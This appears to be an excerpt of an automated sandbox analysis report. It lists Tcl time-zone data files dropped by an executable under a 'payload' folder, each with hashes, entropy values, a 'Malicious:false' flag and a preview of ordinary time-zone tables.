                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Madeira) {.. {-9223372036854775808 -4056 0 LMT}.. {-2713906344 -4056 0 FMT}.. {-1830380400 -3600 0 -01}.. {-1689552000 0 1 +00}.. {-1677798000 -3600 0 -01}.. {-1667433600 0 1 +00}.. {-1647734400 -3600 0 -01}.. {-1635811200 0 1 +00}.. {-1616198400 -3600 0 -01}.. {-1604361600 0 1 +00}.. {-1584662400 -3600 0 -01}.. {-1572739200 0 1 +00}.. {-1553040000 -3600 0 -01}.. {-1541203200 0 1 +00}.. {-1521504000 -3600 0 -01}.. {-1442448000 0 1 +00}.. {-1426809600 -3600 0 -01}.. {-1379289600 0 1 +00}.. {-1364774400 -3600 0 -01}.. {-1348444800 0 1 +00}.. {-1333324800 -3600 0 -01}.. {-1316390400 0 1 +00}.. {-1301270400 -3600 0 -01}.. {-1284336000 0 1 +00}.. {-1269820800 -3600 0 -01}.. {-1221436800 0 1 +00}.. {-1206921600 -3600 0 -01}.. {-1191196800 0 1 +00}.. {-1175472000 -3600 0 -01}.. {-1127692800 0 1 +00}.. {-1111968000 -3600 0 -01}.. {-
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.910514445868106
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2RQqGsA/8rVDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2RQjQD4
                                                                                                                                                                                                                                            MD5:ECB480DA99D29C0ACE67426D45534754
                                                                                                                                                                                                                                            SHA1:784CF126B030C3D883EE541877E6181F795C9697
                                                                                                                                                                                                                                            SHA-256:BDA015714260001BAE2848991DD21E802580BE2915797E5DABC376135D1C5246
                                                                                                                                                                                                                                            SHA-512:54C1B20E45C7C73354DCD4E0F4444720771820ED10B282F745DC391BEADEAEDC629BEF97B1908FB62CDAEC915D32AF1F54FC6AA9DC83E317E7CE19FC2586EF28
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Atlantic/Reykjavik) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):160
                                                                                                                                                                                                                                            Entropy (8bit):5.011466665416709
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2RQqGtlN62/EiMXGm2OHXT14YoHvhFvdQVIyV:SlSWB9eg/2RQrlo2MiDm2OHXqYoHvTFS
                                                                                                                                                                                                                                            MD5:3B310BB8C90CA716DC1AC5A697ACA9CD
                                                                                                                                                                                                                                            SHA1:CD583F49478DCDAD91EF78539502C6FC62945C1E
                                                                                                                                                                                                                                            SHA-256:51BFABCB3388107753A3C1A8CF31118E6627132BAA09B9878D9E7CEDBEBB4886
                                                                                                                                                                                                                                            SHA-512:F593B7A1FAF0EA6B42D5EE86C20C9A8F5CD7ACD9B30EF7755E45ECAFEA8752C32E4CF4BEDF531F494E59D9F0C49CCC6FCA077292E20794AA265DFC0A56DFE579
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/South_Georgia) {.. {-9223372036854775808 -8768 0 LMT}.. {-2524512832 -7200 0 -02}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.880390141563645
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2RQqGt4r+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2RQr4rV
                                                                                                                                                                                                                                            MD5:2C73A963F515376A46762CE153AAF5C5
                                                                                                                                                                                                                                            SHA1:996C3C93DFAD89EA80AC5DFA1DFBD7CECD9ED28D
                                                                                                                                                                                                                                            SHA-256:1C9CA8966FC8BD0BE70F4A187E17E56FB99139BC88C392E82BA2E23E23111C54
                                                                                                                                                                                                                                            SHA-512:35A9ADC047DB058D71C21FC4ECB57CD14B0D9BA4416506763D1800D72CE6C9E81636F332AAD3533616F05C86F90A60416BD4065C5F832A51AA3DC186218BDCAE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Atlantic/St_Helena) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2256
                                                                                                                                                                                                                                            Entropy (8bit):3.662522763865322
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:506KSBSdSs2SbSwGSyPU3lSsS5SGScSo/SkSuShSceS3SBSc7XSiSgSwSd/SJkS6:JKU+Ew0FU1TuhrR//tOIoOjXZfDWSkPR
                                                                                                                                                                                                                                            MD5:77C7ECE4FCBE150069B611C75E8DAA0E
                                                                                                                                                                                                                                            SHA1:22F4E5F15BCA92D8456B70BB36230F2605CA5E1C
                                                                                                                                                                                                                                            SHA-256:F0E99EF01F140CD5AAFE16803A657922207E6F7F6AF10B0AE795790916C302C4
                                                                                                                                                                                                                                            SHA-512:6FB57E8499A587292AFAFA9BD003721572393D5268CAF956230DA76983A112B27D6731BE561A22CCEF84935F43AC988B667C2DC404C157EA8D0E7830FC1A2AB8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Stanley) {.. {-9223372036854775808 -13884 0 LMT}.. {-2524507716 -13884 0 SMT}.. {-1824235716 -14400 0 -04}.. {-1018209600 -10800 1 -04}.. {-1003093200 -14400 0 -04}.. {-986760000 -10800 1 -04}.. {-971643600 -14400 0 -04}.. {-954705600 -10800 1 -04}.. {-939589200 -14400 0 -04}.. {-923256000 -10800 1 -04}.. {-908139600 -14400 0 -04}.. {-891806400 -10800 1 -04}.. {-876690000 -14400 0 -04}.. {-860356800 -10800 1 -04}.. {420606000 -7200 0 -03}.. {433303200 -7200 1 -03}.. {452052000 -10800 0 -03}.. {464151600 -7200 1 -03}.. {483501600 -10800 0 -03}.. {495597600 -14400 0 -04}.. {495604800 -10800 1 -04}.. {514350000 -14400 0 -04}.. {527054400 -10800 1 -04}.. {545799600 -14400 0 -04}.. {558504000 -10800 1 -04}.. {577249200 -14400 0 -04}.. {589953600 -10800 1 -04}.. {608698800 -14400 0 -04}.. {621403200 -10800 1 -04}.. {640753200 -14400 0 -
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.862270414049974
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjpMFBx/h4QWCCj1:SlSWB9vsM3yI9kHAIgmON/2DCeMFB/4d
                                                                                                                                                                                                                                            MD5:2EF41863430897F45E0CBB51E6A44069
                                                                                                                                                                                                                                            SHA1:8E9561060E9509FAF235E5E033FC9C2918E438DB
                                                                                                                                                                                                                                            SHA-256:DF7CBDDCBB2F5926A07D19A35739E5B8DCD9733C037F7D1FF95753C28D574674
                                                                                                                                                                                                                                            SHA-512:9D3A37D64DCCCA28093C30FAB595690D021FACEC15F351A77CA33A779D645D305A2FA031869F0DE3B0404C498C2C321D3D02E4DC592D3C632F6700F5DCB54900
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/ACT) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8372
                                                                                                                                                                                                                                            Entropy (8bit):3.894755849491153
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:j8SY62BXovlCyRL8pJXa4NyPaNw0leasxMQ/UvuQPxBFNsLQ2nDs020DdDncIsea:j8X3Xzgl3PaN8asiQ/Uv9UnvtCaRs
                                                                                                                                                                                                                                            MD5:94E1A0C4326D09AF103107E64625CC6C
                                                                                                                                                                                                                                            SHA1:C026565F020EB158309549D98313632BAA79205F
                                                                                                                                                                                                                                            SHA-256:5C43D3152982BCFD5B9F51D0E909CF3A558BED1C270FEFFE030531D38D6F91B7
                                                                                                                                                                                                                                            SHA-512:CA08A8BC0EB740D59650FE0A9E56D9E169348AD0994F2BFFD6CCFBF9CC42E82F892FB719E80C4E2084B5702E9725C651359EE3066BD71BB19397EA83B6A68430
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Adelaide) {.. {-9223372036854775808 33260 0 LMT}.. {-2364110060 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}.. {31501800 34200 0 ACST}.. {57688200 37800 1 ACDT}.. {67969800 34200 0 ACST}.. {89137800 37800 1 ACDT}.. {100024200 34200 0 ACST}.. {120587400 37800 1 ACDT}.. {131473800 34200 0 ACST}.. {152037000 37800 1 ACDT}.. {162923400 34200 0 ACST}.. {183486600 37800 1 ACDT}.. {194977800 34200 0 ACST}.. {215541000 37800 1 ACDT}.. {226427400 34200 0 ACST}.. {246990600 37800 1 ACDT}.. {257877000 34200 0 ACST}.. {278440200 37800 1 ACDT}.. {289326600 34200 0 ACST}.. {309889800 37800 1 ACDT}.. {320776200 34200 0 ACST}
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):674
                                                                                                                                                                                                                                            Entropy (8bit):4.32071371733564
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862ELmdHLOYCvSi0xT0ryRIvUr0obZv:5ELe6dvSi6L
                                                                                                                                                                                                                                            MD5:900B39F1D4AB93A445F37B6C0A8DE3D9
                                                                                                                                                                                                                                            SHA1:DE82800779DCB8094C395B5024BD01FFA3C3BB8C
                                                                                                                                                                                                                                            SHA-256:0D3C39EDAB34A8DB31A658A1549772F7D69EB57565E40AA87B707953A2D854A4
                                                                                                                                                                                                                                            SHA-512:8D115D1D14FE6FF21A4AE77E3AAC075E6A877214E568956B9A4FD2E75A46E458CAA5AE26B483F128B4C62960D73BD7543BC32F22B760059423B3D9ABCBA24B6A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Brisbane) {.. {-9223372036854775808 36728 0 LMT}.. {-2366791928 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {625593600 39600 1 AEDT}.. {636480000 36000 0 AEST}.. {657043200 39600 1 AEDT}.. {667929600 36000 0 AEST}.. {688492800 39600 1 AEDT}.. {699379200 36000 0 AEST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8437
                                                                                                                                                                                                                                            Entropy (8bit):3.902306256303896
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:QZSSY62BXovldRL8q75aANyPaNw0leasxMQ/UvuQPxBFNsLQ2nDs020DdDncIsea:QZSX3X2QfPaN8asiQ/Uv9UnvtCaRs
                                                                                                                                                                                                                                            MD5:1553DAAB804A6C9BB15D711554980D3B
                                                                                                                                                                                                                                            SHA1:5E3161B1FBB4C246DCB5E11ABD94095121CE38ED
                                                                                                                                                                                                                                            SHA-256:734F295BD0B558BDF6178DE62151B8913699D08AB2B1D101C55B8DEBC410074C
                                                                                                                                                                                                                                            SHA-512:06B21886070E39E390ECBD18841B7FDBFCA2C7C8573495D2BAA2B92EB113CD1C73C18D73C49DE3C49572CBCBCBED2FAD3248BC651BEB825A1E089B1DEDEFCBFA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Broken_Hill) {.. {-9223372036854775808 33948 0 LMT}.. {-2364110748 36000 0 AEST}.. {-2314951200 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}.. {31501800 34200 0 ACST}.. {57688200 37800 1 ACDT}.. {67969800 34200 0 ACST}.. {89137800 37800 1 ACDT}.. {100024200 34200 0 ACST}.. {120587400 37800 1 ACDT}.. {131473800 34200 0 ACST}.. {152037000 37800 1 ACDT}.. {162923400 34200 0 ACST}.. {183486600 37800 1 ACDT}.. {194977800 34200 0 ACST}.. {215541000 37800 1 ACDT}.. {226427400 34200 0 ACST}.. {246990600 37800 1 ACDT}.. {257877000 34200 0 ACST}.. {278440200 37800 1 ACDT}.. {289326600 34200 0 ACST}.. {309889800 37800 1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):195
                                                                                                                                                                                                                                            Entropy (8bit):4.851279484907769
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjnSV1+QWCCjLBn:SlSWB9vsM3yI9kHAIgmON/2DCcq+DCyB
                                                                                                                                                                                                                                            MD5:8944D3DF8FBECC03A8FB18C3B2DA3B53
                                                                                                                                                                                                                                            SHA1:6B17B38D6560592CA49840C47DB9BDA7E79F9F76
                                                                                                                                                                                                                                            SHA-256:5FE3CED97293FE0573D5ECE0CEF59CE5DDB4C57BC568AE7199E77B01D3ADE17C
                                                                                                                                                                                                                                            SHA-512:907D8BB7EA840E0B3AC683884F2F709A2C06D67CE9258BE46400A0DA63581A9B1403A44FA43E1059BE8F5C7E06F9FA05C176309AD6295317BF14F0E9FA5741E4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/Canberra) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):193
                                                                                                                                                                                                                                            Entropy (8bit):4.79231670095588
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yI4DVJHAIgxnvVWAN/2DCkx+4DCVDy:MByMjUQVv8At2s4Ky
                                                                                                                                                                                                                                            MD5:0C1DFC0877CE8EB08007B7C2B7AF2D87
                                                                                                                                                                                                                                            SHA1:02F835BE2DA4FCA79DC2A6959BB4EB6ACC8DF708
                                                                                                                                                                                                                                            SHA-256:1DD4EC4ED4F854E2EF6162B2F28C89208710F8EC5AABB95FFA9425D3FBBCAB13
                                                                                                                                                                                                                                            SHA-512:358347045915B7D10940DB15E49528D0C636BEC1BE70129847D0B9D034F9E96E847394D88358E87D98A9E581605A3C2AB917B85FDE1296F290B4194BB7E3FA46
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Hobart)]} {.. LoadTimeZoneFile Australia/Hobart..}..set TZData(:Australia/Currie) $TZData(:Australia/Hobart)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):437
                                                                                                                                                                                                                                            Entropy (8bit):4.508468081487136
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862pmdHPCvZUjMWpXgda/gd026Xgdvgd+v:5peKvZqMSX+4+56X+v+Q
                                                                                                                                                                                                                                            MD5:A81864B2C0BD7BF81F4FA21F17800059
                                                                                                                                                                                                                                            SHA1:518AC9E040A17083ED3962F4FBB47D1D83764FF7
                                                                                                                                                                                                                                            SHA-256:AC004FD4B3C536406991EC13EBB3E64E0EC0C7B264BC18C0700C8FA545868155
                                                                                                                                                                                                                                            SHA-512:3C24F4C2CC3072B3E820FCC1C68A747DCCBB9481FE743C1555783CC932DCBA44FE4851A732D24EABF62E845474D4E1278F120A04DB7549A18C7C49C31FB8D425
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Darwin) {.. {-9223372036854775808 31400 0 LMT}.. {-2364108200 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):759
                                                                                                                                                                                                                                            Entropy (8bit):4.110997549215461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862EmdHvOYCvV2mV22wF2nUV2CF2+V2pCwF21UF2biV2cHVKF25V2VF2cV2tFq:5Eemdvg2wQCKZ4j5c0LVmtH1iknohwQT
                                                                                                                                                                                                                                            MD5:1BC8DBD2E24606EFA49F933034FC0EEF
                                                                                                                                                                                                                                            SHA1:A511695A1B87A689C6BFF65257C11D3962FDDA3D
                                                                                                                                                                                                                                            SHA-256:79D0C770A304360DB33F3D1EF7B3935F1E4E8125893E0DCE683AC35A51302CFB
                                                                                                                                                                                                                                            SHA-512:A839D390D70F22FC833322029B732F3AE68FF48793B07005041BD12322DD6E5D5E5FF31787AA004A507A57F8FC245133891F266C4EF19D49F085E6B412E5B04C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Eucla) {.. {-9223372036854775808 30928 0 LMT}.. {-2337928528 31500 0 +0945}.. {-1672555500 35100 1 +0945}.. {-1665384300 31500 0 +0945}.. {-883637100 35100 1 +0945}.. {-876120300 31500 0 +0945}.. {-860395500 35100 1 +0945}.. {-844670700 31500 0 +0945}.. {-836473500 35100 0 +0945}.. {152039700 35100 1 +0945}.. {162926100 31500 0 +0945}.. {436295700 35100 1 +0945}.. {447182100 31500 0 +0945}.. {690311700 35100 1 +0945}.. {699383700 31500 0 +0945}.. {1165079700 35100 1 +0945}.. {1174756500 31500 0 +0945}.. {1193505300 35100 1 +0945}.. {1206810900 31500 0 +0945}.. {1224954900 35100 1 +0945}.. {1238260500 31500 0 +0945}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8734
                                                                                                                                                                                                                                            Entropy (8bit):3.8515786470328823
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:aOqigkx6WsYyS39nQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:aOq05hnQiAmcOM6e0pj
                                                                                                                                                                                                                                            MD5:5E04BF8E1DEBFCC4130FDD1BBD67B2DF
                                                                                                                                                                                                                                            SHA1:796AADCE7BB2FAF5E6FC916C941A4E3DCAFACC9E
                                                                                                                                                                                                                                            SHA-256:D813F6A97BEFC22CA4F24C59EB755D269B9C68A449CC7CF0D2C61F911860EBE7
                                                                                                                                                                                                                                            SHA-512:3A69CF1D1F57D6BD39E5F4DAF76BBB06A749D42BEB29452A0A5BDAA68F5DACC0DF176EDDA7A083F5B5B84FC651926C09D46CAAD2F6C4F1595AB9CCA1A958D653
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Hobart) {.. {-9223372036854775808 35356 0 LMT}.. {-2345795356 36000 0 AEST}.. {-1680508800 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-1646640000 39600 1 AEDT}.. {-1635753600 36000 0 AEST}.. {-1615190400 39600 1 AEDT}.. {-1604304000 36000 0 AEST}.. {-1583920800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {-94730400 36000 0 AEST}.. {-71136000 39600 1 AEDT}.. {-55411200 36000 0 AEST}.. {-37267200 39600 1 AEDT}.. {-25776000 36000 0 AEST}.. {-5817600 39600 1 AEDT}.. {5673600 36000 0 AEST}.. {25632000 39600 1 AEDT}.. {37728000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AES
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):199
                                                                                                                                                                                                                                            Entropy (8bit):4.912882643701746
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yIoGEoPHAIgjGg6N/2DCkx/2DCPGUv:MByMjeXV6t2a8v
                                                                                                                                                                                                                                            MD5:425DC7B1E31F4AA41DAD74E3C9AE3562
                                                                                                                                                                                                                                            SHA1:D92A3269F7BF5EC00F082C64CEF6E20C43017180
                                                                                                                                                                                                                                            SHA-256:4D84E4040FBC529C9E0366BB74D0CFADEEEEDA0DFCC6C2C9204DED6C6455CAC3
                                                                                                                                                                                                                                            SHA-512:F3031F16C0D00D9F8A38CD378F599EB3E63F4FF85F120DB38E3013E93F08E6F512D969F164BBC88CD625910FB3E086F3352E5B8FFC1373C3CC98F363FB3FD3F7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Lord_Howe)]} {.. LoadTimeZoneFile Australia/Lord_Howe..}..set TZData(:Australia/LHI) $TZData(:Australia/Lord_Howe)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):824
                                                                                                                                                                                                                                            Entropy (8bit):4.249672335529665
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862gtmdHVCvCi0xT0ryRIvUr0obbty/ywtUj3yv:5gteMvCi6Xlt8
                                                                                                                                                                                                                                            MD5:504A422280E0459A2126E7CB02F527E6
                                                                                                                                                                                                                                            SHA1:EF61B98EFB1E44EE59020E99A69EA67D6B8ACFC2
                                                                                                                                                                                                                                            SHA-256:01B278309353849CC2FDF62A30E2FF483833D5713CF5E329252738BE6F2C0A84
                                                                                                                                                                                                                                            SHA-512:BFDAAD56D817CD3AAB17DFD0A33EFDD422645BC542ABE269C0F8520E33796DF4F19EAB2E40BFC6C4AF93EF654239B8F2E285639B4662040D865B9C340A23CFAD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Lindeman) {.. {-9223372036854775808 35756 0 LMT}.. {-2366790956 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {625593600 39600 1 AEDT}.. {636480000 36000 0 AEST}.. {657043200 39600 1 AEDT}.. {667929600 36000 0 AEST}.. {688492800 39600 1 AEDT}.. {699379200 36000 0 AEST}.. {709912800 36000 0 AEST}.. {719942400 39600 1 AEDT}.. {731433600 36000 0 AEST}.. {751996800 39600 1 AEDT}.. {762883200 36000 0 AEST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7764
                                                                                                                                                                                                                                            Entropy (8bit):3.5615258807990537
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:pmz39IyKxb/JbcD9gKniAF23QbNS1fEGXALNbbT2JFJ/FaKaTQ9ZJhRVK:p+cpVKniAF2AbkFKL
                                                                                                                                                                                                                                            MD5:10F983F4683CDE13A1228AC0B04D8513
                                                                                                                                                                                                                                            SHA1:45378BA5949BE53D698108F50FECFF50C9E3D296
                                                                                                                                                                                                                                            SHA-256:76D1F1ED67B8F8D6903789C2FDDF79590A83677972D416F5F3C9687614EC6238
                                                                                                                                                                                                                                            SHA-512:D60D802EF215A33750E4F859657BA12A67084B1E9FCF1B4A7CEEE7B9D816BC2C6670775D93C88EC8380CDD7790AD574133D6F90F0828F848313C26583B2F196A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Lord_Howe) {.. {-9223372036854775808 38180 0 LMT}.. {-2364114980 36000 0 AEST}.. {352216800 37800 0 +1030}.. {372785400 41400 1 +1030}.. {384273000 37800 0 +1030}.. {404839800 41400 1 +1030}.. {415722600 37800 0 +1030}.. {436289400 41400 1 +1030}.. {447172200 37800 0 +1030}.. {467739000 41400 1 +1030}.. {478621800 37800 0 +1030}.. {488984400 37800 0 +1030}.. {499188600 39600 1 +1030}.. {511282800 37800 0 +1030}.. {530033400 39600 1 +1030}.. {542732400 37800 0 +1030}.. {562087800 39600 1 +1030}.. {574786800 37800 0 +1030}.. {594142200 39600 1 +1030}.. {606236400 37800 0 +1030}.. {625591800 39600 1 +1030}.. {636476400 37800 0 +1030}.. {657041400 39600 1 +1030}.. {667926000 37800 0 +1030}.. {688491000 39600 1 +1030}.. {699375600 37800 0 +1030}.. {719940600 39600 1 +1030}.. {731430000 37800 0 +1030}.. {751995000 39600 1 +1030}.. {762
